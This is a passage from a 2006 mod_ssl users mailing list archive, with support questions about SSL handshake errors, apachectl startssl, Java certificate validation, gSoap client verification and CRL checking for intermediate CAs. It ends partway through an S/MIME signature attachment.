Received: from imss.nucleussoftware.com (smtpdel1.nucleussoftware.com [202.56.236.66])
	by master.modssl.org (Postfix) with ESMTP id 49E9B14D82B;
	Sat, 16 Sep 2006 18:28:28 +0200 (CEST)
From: 
To: modssl-users@modssl.org
Cc: majordomo@modssl.org
Message-ID: <6f1f8705e1.705e16f1f8@nucleussoftware.com>
Date: Sun, 17 Sep 2006 00:28:15 +0800
MIME-Version: 1.0
Content-Language: en
Subject: Re: Welcome to modssl-users
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I am facing below problem causing performance deterioration:

[Fri Sep 15 15:09:17 2006] [error] mod_ossl: SSL call to NZ function 
nzos_Handshake failed with error 28864 (server apssrv.com:443, client 
xxx.xxx.x.xxx)
[Fri Sep 15 15:09:17 2006] [error] mod_ossl: SSL IO error [Hint: the 
client stop the connection unexpectedly]

Pl suggest how to control it.

Regards,
Anurag Jain

----- Original Message -----
From: majordomo@modssl.org
Date: Sunday, September 17, 2006 0:20 am
Subject: Welcome to modssl-users

> --
> 
> Welcome to the modssl-users mailing list!
> 
> Please save this message for future reference.  Thank you.
> 
> If you ever want to remove yourself from this mailing list,
> you can send mail to  with the following
> command in the body of your email message:
> 
>    unsubscribe modssl-users
> 
> or from another account, besides anurag.jain@nucleussoftware.com:
> 
>    unsubscribe modssl-users anurag.jain@nucleussoftware.com
> 
> If you ever need to get in contact with the owner of the list,
> (if you have trouble unsubscribing, or have questions about the
> list itself) send email to  .
> This is the general rule for most mailing lists when you need
> to contact a human.
> 
> Here's the general information for the list you've subscribed to,
> in case you don't already have it:
> 
> Apache Interface to OpenSSL (mod_ssl)                   
www.modssl.org
> User Support Mailing List                      modssl-
users@modssl.org
> Automated List Manager                            
majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 18 06:48:05 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EA87314D9DE; Mon, 18 Sep 2006 06:48:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from vms044pub.verizon.net (vms044pub.verizon.net [206.46.252.44])
	by master.modssl.org (Postfix) with ESMTP id 7C41214D82B
	for ; Mon, 18 Sep 2006 06:48:02 +0200 (CEST)
Received: from [127.0.0.1] ([72.66.17.115])
 by vms044.mailsrvcs.net (Sun Java System Messaging Server 6.2-4.02 (built Sep
 9 2005)) with ESMTPA id <0J5R00M4KUNADCN0@vms044.mailsrvcs.net> for
 modssl-users@modssl.org; Sun, 17 Sep 2006 23:47:35 -0500 (CDT)
Date: Mon, 18 Sep 2006 00:47:33 -0400
From: Mark Leone 
Subject: Upgraded to Mac OSX Tiger and now apachectl -startssl no longer needed
To: modssl-users@modssl.org
Message-id: <450E24E5.2090403@verizon.net>
MIME-version: 1.0
Content-type: text/plain; charset=ISO-8859-1; format=flowed
Content-transfer-encoding: 7bit
User-Agent: Thunderbird 1.5.0.7 (Windows/20060909)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mark Leone 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I finally got around to upgrading my Mac to Tiger. I had to copy my old 
httpd.conf file to the proper directory; but other than that it works fine.

However, apachectl no longer accepts "startssl" as an argument (it 
returns with a "usage" instruction that prescribes start, stop, etc.). 
It works fine with "apachectl start"; but to my surprise the server that 
starts up with this command accepts https requests and sends the cert I 
set up previously.

I could re-build and re-install apache and mod_ssl as I did originally 
before the OS upgrade, but do I need to bother with that? I remember 
that apachectl should require startssl as an argument in order to 
startup the SSL server, so it seems something weird is going on, and I 
wonder if I need to make it behave the way it used to.

-Mark

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 18 15:40:38 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A91FB14D9DE; Mon, 18 Sep 2006 15:40:38 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtpgate.vicr.com (smtpgate.vicr.com [207.141.187.5])
	by master.modssl.org (Postfix) with ESMTP id B052E14D84F
	for ; Mon, 18 Sep 2006 15:40:36 +0200 (CEST)
Received: from 25exch1.vicorpower.vicr.com ([172.20.20.30]) by exchgate.vicorpower.vicr.com with Microsoft SMTPSVC(5.0.2195.6713);
	 Mon, 18 Sep 2006 09:40:28 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.0.6603.0
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C6DB28.00A82674"
Subject: Certificate issue.
Date: Mon, 18 Sep 2006 09:40:28 -0400
Message-ID: <4001DEAF7DF9BD498B58B45051FBEA65038E6D36@25exch1.vicorpower.vicr.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Certificate issue.
Thread-Index: AcbbJ/uomH4a1BaCSnekm9RJUrgEhQ==
From: "Waller, Lonie" 
To: 
X-OriginalArrivalTime: 18 Sep 2006 13:40:28.0390 (UTC) FILETIME=[00B87060:01C6DB28]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Waller, Lonie" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C6DB28.00A82674
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable

Hello,=20
=20
Was wondering if anyone has seen this error and can help me correcting
it? It is for a test box self signed certificate is all I need.=20
=20
Thanks
Lonie
=20

HTTP Status 500 -=20

  _____ =20


type Exception report

message=20

description The server encountered an internal error () that prevented
it from fulfilling this request.

exception=20
javax.servlet.ServletException:
sun.security.validator.ValidatorException: PKIX path building failed:
sun.security.provider.certpath.SunCertPathBuilderException: unable to
find valid certification path to requested target
=09
edu.yale.its.tp.cas.client.filter.CASFilter.getAuthenticatedUser(CASFilt
er.java:319)
=09
edu.yale.its.tp.cas.client.filter.CASFilter.doFilter(CASFilter.java:225)


root cause=20
javax.net.ssl.SSLHandshakeException:
sun.security.validator.ValidatorException: PKIX path building failed:
sun.security.provider.certpath.SunCertPathBuilderException: unable to
find valid certification path to requested target
=09
com.sun.net.ssl.internal.ssl.Alerts.getSSLException(Alerts.java:150)
=09
com.sun.net.ssl.internal.ssl.SSLSocketImpl.fatal(SSLSocketImpl.java:1476
)
=09
com.sun.net.ssl.internal.ssl.Handshaker.fatalSE(Handshaker.java:174)
=09
com.sun.net.ssl.internal.ssl.Handshaker.fatalSE(Handshaker.java:168)
=09
com.sun.net.ssl.internal.ssl.ClientHandshaker.serverCertificate(ClientHa
ndshaker.java:847)
=09
com.sun.net.ssl.internal.ssl.ClientHandshaker.processMessage(ClientHands
haker.java:106)
=09
com.sun.net.ssl.internal.ssl.Handshaker.processLoop(Handshaker.java:495)
=09
com.sun.net.ssl.internal.ssl.Handshaker.process_record(Handshaker.java:4
33)
=09
com.sun.net.ssl.internal.ssl.SSLSocketImpl.readRecord(SSLSocketImpl.java
:815)
=09
com.sun.net.ssl.internal.ssl.SSLSocketImpl.performInitialHandshake(SSLSo
cketImpl.java:1025)
=09
com.sun.net.ssl.internal.ssl.SSLSocketImpl.startHandshake(SSLSocketImpl.
java:1038)
=09
sun.net.www.protocol.https.HttpsClient.afterConnect(HttpsClient.java:402
)
=09
sun.net.www.protocol.https.AbstractDelegateHttpsURLConnection.connect(Ab
stractDelegateHttpsURLConnection.java:170)
=09
sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnec
tion.java:913)
=09
sun.net.www.protocol.https.HttpsURLConnectionImpl.getInputStream(HttpsUR
LConnectionImpl.java:234)
	edu.yale.its.tp.cas.util.SecureURL.retrieve(SecureURL.java:70)
=09
edu.yale.its.tp.cas.client.ServiceTicketValidator.validate(ServiceTicket
Validator.java:278)
=09
edu.yale.its.tp.cas.client.filter.CASFilter.getAuthenticatedUser(CASFilt
er.java:283)
=09
edu.yale.its.tp.cas.client.filter.CASFilter.doFilter(CASFilter.java:225)


note The full stack trace of the root cause is available in the Apache
Tomcat/5.0.27 logs.

  _____ =20


Apache Tomcat/5.0.27


------_=_NextPart_001_01C6DB28.00A82674
Content-Type: text/html;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable







Hello, =




 


Was =
wondering if=20
anyone has seen this error and can help me correcting it? It is for a =
test box=20
self signed certificate is all I need. 


 


Thanks


Lonie


 




HTTP Status 500 - 





type=20
Exception report


message=20



description The server encountered an =
internal error=20
() that prevented it from fulfilling this request.


exception=20

javax.servlet.ServletException: =
sun.security.validator.ValidatorException: PKIX path building failed: =
sun.security.provider.certpath.SunCertPathBuilderException: unable to =
find valid certification path to requested target
	=
edu.yale.its.tp.cas.client.filter.CASFilter.getAuthenticatedUser(CASFilte=
r.java:319)
	=
edu.yale.its.tp.cas.client.filter.CASFilter.doFilter(CASFilter.java:225)





root=20
cause 
javax.net.ssl.SSLHandshakeException: =
sun.security.validator.ValidatorException: PKIX path building failed: =
sun.security.provider.certpath.SunCertPathBuilderException: unable to =
find valid certification path to requested target
	com.sun.net.ssl.internal.ssl.Alerts.getSSLException(Alerts.java:150)
	=
com.sun.net.ssl.internal.ssl.SSLSocketImpl.fatal(SSLSocketImpl.java:1476)=

	com.sun.net.ssl.internal.ssl.Handshaker.fatalSE(Handshaker.java:174)
	com.sun.net.ssl.internal.ssl.Handshaker.fatalSE(Handshaker.java:168)
	=
com.sun.net.ssl.internal.ssl.ClientHandshaker.serverCertificate(ClientHan=
dshaker.java:847)
	=
com.sun.net.ssl.internal.ssl.ClientHandshaker.processMessage(ClientHandsh=
aker.java:106)
	=
com.sun.net.ssl.internal.ssl.Handshaker.processLoop(Handshaker.java:495)
	=
com.sun.net.ssl.internal.ssl.Handshaker.process_record(Handshaker.java:43=
3)
	=
com.sun.net.ssl.internal.ssl.SSLSocketImpl.readRecord(SSLSocketImpl.java:=
815)
	=
com.sun.net.ssl.internal.ssl.SSLSocketImpl.performInitialHandshake(SSLSoc=
ketImpl.java:1025)
	=
com.sun.net.ssl.internal.ssl.SSLSocketImpl.startHandshake(SSLSocketImpl.j=
ava:1038)
	=
sun.net.www.protocol.https.HttpsClient.afterConnect(HttpsClient.java:402)=

	=
sun.net.www.protocol.https.AbstractDelegateHttpsURLConnection.connect(Abs=
tractDelegateHttpsURLConnection.java:170)
	=
sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnect=
ion.java:913)
	=
sun.net.www.protocol.https.HttpsURLConnectionImpl.getInputStream(HttpsURL=
ConnectionImpl.java:234)
	edu.yale.its.tp.cas.util.SecureURL.retrieve(SecureURL.java:70)
	=
edu.yale.its.tp.cas.client.ServiceTicketValidator.validate(ServiceTicketV=
alidator.java:278)
	=
edu.yale.its.tp.cas.client.filter.CASFilter.getAuthenticatedUser(CASFilte=
r.java:283)
	=
edu.yale.its.tp.cas.client.filter.CASFilter.doFilter(CASFilter.java:225)





note=20
The full stack trace of the root cause is available in the Apache=20
Tomcat/5.0.27 logs.





Apache Tomcat/5.0.27


------_=_NextPart_001_01C6DB28.00A82674--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 21 19:20:39 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5216614D9F0; Thu, 21 Sep 2006 19:20:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bgerelbas02.asiapac.hp.net (bgerelbas02.asiapac.hp.net [15.219.201.135])
	by master.modssl.org (Postfix) with ESMTP id EE9B314D854
	for ; Thu, 21 Sep 2006 19:20:38 +0200 (CEST)
Received: from bgeexg12.asiapacific.cpqcorp.net (bgeexg12.asiapacific.cpqcorp.net [16.150.33.62])
	by bgerelbas02.asiapac.hp.net (Postfix) with ESMTP id 3CC13333D2
	for ; Thu, 21 Sep 2006 22:50:29 +0530 (IST)
Received: from bgeexc01.asiapacific.cpqcorp.net ([16.150.33.37]) by bgeexg12.asiapacific.cpqcorp.net with Microsoft SMTPSVC(6.0.3790.1830);
	 Thu, 21 Sep 2006 22:50:28 +0530
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: mod_ssl and Apache with gSoap
Date: Thu, 21 Sep 2006 22:50:22 +0530
Message-ID: <9E48BAB2A730F44D92472DC1224056A30376C94D@bgeexc01.asiapacific.cpqcorp.net>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: mod_ssl and Apache with gSoap
Thread-Index: Acbdojf42eJ+WUFfTwC7mfPMAjaMtQ==
From: "Sriram, Prashanth Pigileti (STSD)" 
To: 
X-OriginalArrivalTime: 21 Sep 2006 17:20:29.0044 (UTC) FILETIME=[3C29A340:01C6DDA2]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Sriram, Prashanth Pigileti (STSD)" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

   This is regarding using Apache server with mod_ssl and mod_gsoap
modules. I am confused as to who would handle the certificate
verification in such a case where the directive 'SSLVerifyClient' is set
to 2. I understand gSoap has it' own authentication layer for users and
might actually interrupt the usual HTTPS certificate verification
process. Please let me know if any specific configurations can ensure
that mod_ssl would certify clients before allowing access to gSoap web
services.

Thanks in Advance,
Prashanth
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 22 17:51:20 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2005714D884; Fri, 22 Sep 2006 17:51:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hqusareur.army.mil (mail1.hqusareur.army.mil [144.170.66.103])
	by master.modssl.org (Postfix) with ESMTP id DA95C14D82C
	for ; Fri, 22 Sep 2006 17:51:19 +0200 (CEST)
Message-ID: <673CAD77D9D4C14DB8B949B4A30F39C904883328@CMBL0019HQUS412.EUR.DS.ARMY.MIL>
From: "Rhoden, Barret J. Mr. CN (NGIT) HQ USAREUR/7A CIO G6"
	 
To: "'modssl-users@modssl.org'" 
Subject: CRLs and Intermediate CAs in Apache
Date: Fri, 22 Sep 2006 17:50:50 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2658.27)
MIME-Version: 1.0
Content-Type: multipart/signed;
	protocol="application/x-pkcs7-signature";
	micalg=SHA1;
	boundary="----=_NextPart_000_00F0_01C6DE6F.A3606EE0"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2962
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rhoden, Barret J. Mr. CN (NGIT) HQ USAREUR/7A CIO G6" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_00F0_01C6DE6F.A3606EE0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

hi - 

does anyone know if apache checks the CRLs for a revoked intermediate CA
certificate?  

for instance, say i set SSLVerifyDepth to 2 and i have the CRLs for the root
CA, as well as the intermediate CAs.  the client has a client certificate
signed by an intermediate CA.  the client's cert is not on the CRL, but the
intermediate CA has been revoked by the root.  when the ssl module works
it's way up the certificate chain, does it check each cert in the chain
against it's higher's CRL, or is the client certificate the only one checked
for revocation?

thanks in advance.

barret

------=_NextPart_000_00F0_01C6DE6F.A3606EE0
Content-Type: application/x-pkcs7-signature;
	name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="smime.p7s"

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIQhzCCA3Aw
ggJYoAMCAQICAQUwDQYJKoZIhvcNAQEFBQAwWzELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1UuUy4g
R292ZXJubWVudDEMMAoGA1UECxMDRG9EMQwwCgYDVQQLEwNQS0kxFjAUBgNVBAMTDURvRCBSb290
IENBIDIwHhcNMDQxMjEzMTUwMDEwWhcNMjkxMjA1MTUwMDEwWjBbMQswCQYDVQQGEwJVUzEYMBYG
A1UEChMPVS5TLiBHb3Zlcm5tZW50MQwwCgYDVQQLEwNEb0QxDDAKBgNVBAsTA1BLSTEWMBQGA1UE
AxMNRG9EIFJvb3QgQ0EgMjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMAswfaNO6z/
PzzWcb64dCIH7HBBFfyrQOMHqsHD2J/+2kw6vz/I2Ch7SzYBwKxFJcPSDgqPhRhkED0aE3Aqb47X
3I2Ts0EPOCHNravCPSoF01cRNw3NjFH5k+PMRkkhjhS0zcsUPjjNcjHuqxLyZeo0LlZd/+5jdctt
upE0/J7z9C0cvlDEQt9ZiP9qs/qobD3LVnFxBZa7n4DlgEVZZ0Gw68OtYKSAdQYXnA70Q+CZDhv7
f/WzzLKBgrH9MsG4vkGkZLVgOlpRMIzO3kEsGUdcSRBkuXSph0GvfW66wbihv2UxOgRn+bW7jpKK
AGO4seaMOF+D/1DVO6Jda7IQzGMCAwEAAaM/MD0wHQYDVR0OBBYEFEl0uwxeunr+AlTve6DGlcYJ
gHCWMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBBQUAA4IBAQCYkY0/
ici79cBpcyk7Nay6swh2PXAJkumERCEBfRR2G+5RbB2NFTctezFp9JpEuK9GzDT6I8sDJxnSgyF1
K+fgG5km3IRAleio0sz2WFxm7z9KlxCCHboKot1bBiudp2RO6y4BNaS0PxOtVeTVc6hpmxHxmPIx
Hm9A1Ph4n46RoG9wBJBmqgYrzuF6krV94eDRluehOi3MsZ0fBUTth5nTTRpwOcEEDOV+2fGv1yAO
8SJ6JaRzmcw/pAcnlqiile2CuRbTnguHwsHyiPVi32jfx7xpUe2xXNxUVCkPCTmarAPB2wxNrm8K
ehZJ8b+R0jiU0/aVLLdsyUK2jcqQjYXZMIIEOjCCAyKgAwIBAgIBCjANBgkqhkiG9w0BAQUFADBb
MQswCQYDVQQGEwJVUzEYMBYGA1UEChMPVS5TLiBHb3Zlcm5tZW50MQwwCgYDVQQLEwNEb0QxDDAK
BgNVBAsTA1BLSTEWMBQGA1UEAxMNRG9EIFJvb3QgQ0EgMjAeFw0wNjAxMDIxNjQ1NTVaFw0xMjAx
MDExNjQ1NTVaMF0xCzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9VLlMuIEdvdmVybm1lbnQxDDAKBgNV
BAsTA0RvRDEMMAoGA1UECxMDUEtJMRgwFgYDVQQDEw9ET0QgRU1BSUwgQ0EtMTEwgZ8wDQYJKoZI
hvcNAQEBBQADgY0AMIGJAoGBAJt/S53u+fQFTZVCVscNoG3PEvOPdQ9esPH/+QYHoT2D6eyl8h/P
/XDcn1Ol44MuGiOyJSqQu4+z1JTUlr4fIqFIqb2ZPH7TvLhTVBVBm+72CEP+GQ0PdPVPimEhCkbe
mKEOll0EDrAglPgr2v/2UqpWGraX3F9emrd2goG5uLbzAgMBAAGjggGJMIIBhTAOBgNVHQ8BAf8E
BAMCAYYwHwYDVR0jBBgwFoAUSXS7DF66ev4CVO97oMaVxgmAcJYwHQYDVR0OBBYEFFMVA0XudKE0
XWyGr3JmgW/prX8SMAwGA1UdJAQFMAOAAQAwDwYDVR0TAQH/BAUwAwEB/zAwBgNVHSAEKTAnMAsG
CWCGSAFlAgELBTALBglghkgBZQIBCwkwCwYJYIZIAWUCAQsKMIHhBgNVHR8EgdkwgdYwOqA4oDaG
NGh0dHA6Ly9jcmwuY2hhbWIuZGlzYS5taWwvZ2V0Y3JsP0RvRCUyMFJvb3QlMjBDQSUyMDIwgZeg
gZSggZGGgY5sZGFwOi8vY3JsLmNoYW1iLmRpc2EubWlsL2NuJTNkRG9EJTIwUm9vdCUyMENBJTIw
MiUyY291JTNkUEtJJTJjb3UlM2REb0QlMmNvJTNkVS5TLiUyMEdvdmVybm1lbnQlMmNjJTNkVVMl
M2ZjZXJ0aWZpY2F0ZXJldm9jYXRpb25saXN0JTNiYmluYXJ5MA0GCSqGSIb3DQEBBQUAA4IBAQAV
W1W5SW90jXnRBVlZW4It5eYWRoVLNs8eEDMDEi8Yju5mTBYXms45LYHqFOQgMIOivDQ6LJucW+ci
T79LiQqkSng8FFgWCMAWUT9k5HZSvGfv4vBxW7IZjr2Cvo4yEUCK97hh24oRNl+8J10ASIMgOjRK
kdVukh/KmTbiIdSwmBg/WQRcj1A9C59j2ITb8N8/UUPGppaMrMV1TWX1TzAkGcng6/dWUYODfe8v
Cm42sskZKew/ndIQg97x6F7o5PvtwrSQsJ/DxXJdTuZx9SxGTCYqLgkyyaGd5wLB3PN9VqvRcab2
h9L+ZN2juAkPxqJv88cZ2pKZhTYjlcpunIHSMIIEQTCCA6qgAwIBAgIDD4U3MA0GCSqGSIb3DQEB
BQUAMF0xCzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9VLlMuIEdvdmVybm1lbnQxDDAKBgNVBAsTA0Rv
RDEMMAoGA1UECxMDUEtJMRgwFgYDVQQDEw9ET0QgRU1BSUwgQ0EtMTEwHhcNMDYwODE1MDAwMDAw
WhcNMDgwOTI4MjM1OTU5WjCBgjELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1UuUy4gR292ZXJubWVu
dDEMMAoGA1UECxMDRG9EMQwwCgYDVQQLEwNQS0kxEzARBgNVBAsTCkNPTlRSQUNUT1IxKDAmBgNV
BAMTH1JIT0RFTi5CQVJSRVQuSk9TRVBILjEwMzMzMTgzNjMwgZ8wDQYJKoZIhvcNAQEBBQADgY0A
MIGJAoGBAOaMCg59ekyDIEyKqDtVZRYBzDtLdoB8LUzbdpwS8QIPR5WF4V/n3bXkKQ/ovUiHRTVp
Bs0clDdOuJkeOWlUvB0krsP0wpt/cTjqwqAHNfvEFfSWWJDh5iNi3oyDuLJ9MgTvCJqwLlxCQZ1K
IsHN0IQegxEf1e9Pb9Z2g2jvU2CnAgMBAAGjggHnMIIB4zAOBgNVHQ8BAf8EBAMCBSAwJAYDVR0R
BB0wG4EZYmFycmV0LnJob2RlbkB1cy5hcm15Lm1pbDAfBgNVHSMEGDAWgBRTFQNF7nShNF1shq9y
ZoFv6a1/EjAdBgNVHQ4EFgQUa/L1eKk7KVnsAUSfvFp8phl9bYkwFgYDVR0gBA8wDTALBglghkgB
ZQIBCwkwcwYIKwYBBQUHAQEEZzBlMEEGCCsGAQUFBzAChjVodHRwOi8vY3JsLmNoYW1iLmRpc2Eu
bWlsL2dldHNpZ24/RE9EJTIwRU1BSUwlMjBDQS0xMTAgBggrBgEFBQcwAYYUaHR0cDovL29jc3Au
ZGlzYS5taWwwgd0GA1UdHwSB1TCB0jA6oDigNoY0aHR0cDovL2NybC5jaGFtYi5kaXNhLm1pbC9n
ZXRjcmw/RE9EJTIwRU1BSUwlMjBDQS0xMTCBk6CBkKCBjYaBimxkYXA6Ly9jcmwuY2hhbWIuZGlz
YS5taWwvY24lM2REb0QlMjBFTUFJTCUyMENBLTExJTJjb3UlM2RQS0klMmNvdSUzZERvRCUyY28l
M2RVLlMuJTIwR292ZXJubWVudCUyY2MlM2RVUz9jZXJ0aWZpY2F0ZXJldm9jYXRpb25saXN0O2Jp
bmFyeTANBgkqhkiG9w0BAQUFAAOBgQCaNMz38W9/gOXTX6rP6sdAPJSh2X6y1V6Kd/nL5Q+DJp5T
VwA0Z/iBZhNnahA1QqJ29qMnTR2Z2RdzplobDAlL1xaNH0dnYc9RtkREh/iZgZC35de2+O/oXgVn
F6KtpQzNzmy5F4KnP79pmE6eaWQ8ZVfTelXcrNM+XySD0Kh2VTCCBIwwggP1oAMCAQICAw+FOzAN
BgkqhkiG9w0BAQUFADBdMQswCQYDVQQGEwJVUzEYMBYGA1UEChMPVS5TLiBHb3Zlcm5tZW50MQww
CgYDVQQLEwNEb0QxDDAKBgNVBAsTA1BLSTEYMBYGA1UEAxMPRE9EIEVNQUlMIENBLTExMB4XDTA2
MDgxNTAwMDAwMFoXDTA4MDkyODIzNTk1OVowgYIxCzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9VLlMu
IEdvdmVybm1lbnQxDDAKBgNVBAsTA0RvRDEMMAoGA1UECxMDUEtJMRMwEQYDVQQLEwpDT05UUkFD
VE9SMSgwJgYDVQQDEx9SSE9ERU4uQkFSUkVULkpPU0VQSC4xMDMzMzE4MzYzMIGfMA0GCSqGSIb3
DQEBAQUAA4GNADCBiQKBgQDbPGi6UXFj308mjrYM+GBzh+Zb5eAEFsiIuBZLm3OXW9JgRfcmpC+9
zbk23ShtHunsC4kSsQxu6a8zeQvTdH/xeECvMjHUHGmdevFAYm7m0eUJ7cjCx9oG0PJDCkSIVn4Z
Q1brSXDt5FGHcW8TVKlJS6ZzcanQdj1uPl3DXBOeLwIDAQABo4ICMjCCAi4wDgYDVR0PAQH/BAQD
AgbAMB8GA1UdIwQYMBaAFFMVA0XudKE0XWyGr3JmgW/prX8SMB0GA1UdDgQWBBTNpXd3ebuYfdZi
7MqjrqqRAsqJJzAWBgNVHSAEDzANMAsGCWCGSAFlAgELCTBzBggrBgEFBQcBAQRnMGUwQQYIKwYB
BQUHMAKGNWh0dHA6Ly9jcmwuY2hhbWIuZGlzYS5taWwvZ2V0c2lnbj9ET0QlMjBFTUFJTCUyMENB
LTExMCAGCCsGAQUFBzABhhRodHRwOi8vb2NzcC5kaXNhLm1pbDCB3QYDVR0fBIHVMIHSMDqgOKA2
hjRodHRwOi8vY3JsLmNoYW1iLmRpc2EubWlsL2dldGNybD9ET0QlMjBFTUFJTCUyMENBLTExMIGT
oIGQoIGNhoGKbGRhcDovL2NybC5jaGFtYi5kaXNhLm1pbC9jbiUzZERvRCUyMEVNQUlMJTIwQ0Et
MTElMmNvdSUzZFBLSSUyY291JTNkRG9EJTJjbyUzZFUuUy4lMjBHb3Zlcm5tZW50JTJjYyUzZFVT
P2NlcnRpZmljYXRlcmV2b2NhdGlvbmxpc3Q7YmluYXJ5MCkGA1UdJQQiMCAGCisGAQQBgjcUAgIG
CCsGAQUFBwMEBggrBgEFBQcDAjBEBgNVHREEPTA7gRliYXJyZXQucmhvZGVuQHVzLmFybXkubWls
oB4GCisGAQQBgjcUAgOgEAwOMTAzMzMxODM2M0BtaWwwDQYJKoZIhvcNAQEFBQADgYEARUnjK8Nl
dkULmiNcGSV96GYS8TLncTe/fLKDxTCrvOCRdIMdJe82YoBRlAPcrYMLgrHgJkGSrhPCxXRKfhVy
vReYrCwYELib7o1RqA5ayMp4YNSogxrRXQ1xh6zjBTXdICMtkATndnc9d3MXSyN9U1tRAUV2TE+d
Thj7nX0R+hUxggLAMIICvAIBATBkMF0xCzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9VLlMuIEdvdmVy
bm1lbnQxDDAKBgNVBAsTA0RvRDEMMAoGA1UECxMDUEtJMRgwFgYDVQQDEw9ET0QgRU1BSUwgQ0Et
MTECAw+FOzAJBgUrDgMCGgUAoIIBsjAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3
DQEJBTEPFw0wNjA5MjIxNTUwNDlaMCMGCSqGSIb3DQEJBDEWBBTU91UTmhF5bI4CzoCZnC8SK6mM
njBnBgkqhkiG9w0BCQ8xWjBYMAoGCCqGSIb3DQMHMA4GCCqGSIb3DQMCAgIAgDANBggqhkiG9w0D
AgIBQDAHBgUrDgMCBzANBggqhkiG9w0DAgIBKDAHBgUrDgMCGjAKBggqhkiG9w0CBTBzBgkrBgEE
AYI3EAQxZjBkMF0xCzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9VLlMuIEdvdmVybm1lbnQxDDAKBgNV
BAsTA0RvRDEMMAoGA1UECxMDUEtJMRgwFgYDVQQDEw9ET0QgRU1BSUwgQ0EtMTECAw+FNzB1Bgsq
hkiG9w0BCRACCzFmoGQwXTELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1UuUy4gR292ZXJubWVudDEM
MAoGA1UECxMDRG9EMQwwCgYDVQQLEwNQS0kxGDAWBgNVBAMTD0RPRCBFTUFJTCBDQS0xMQIDD4U3
MA0GCSqGSIb3DQEBAQUABIGAcBQ1kHmIxAsp2ThfbWjlJ/OPPkgohczkffWyDFxQB+07tYhHXXOl
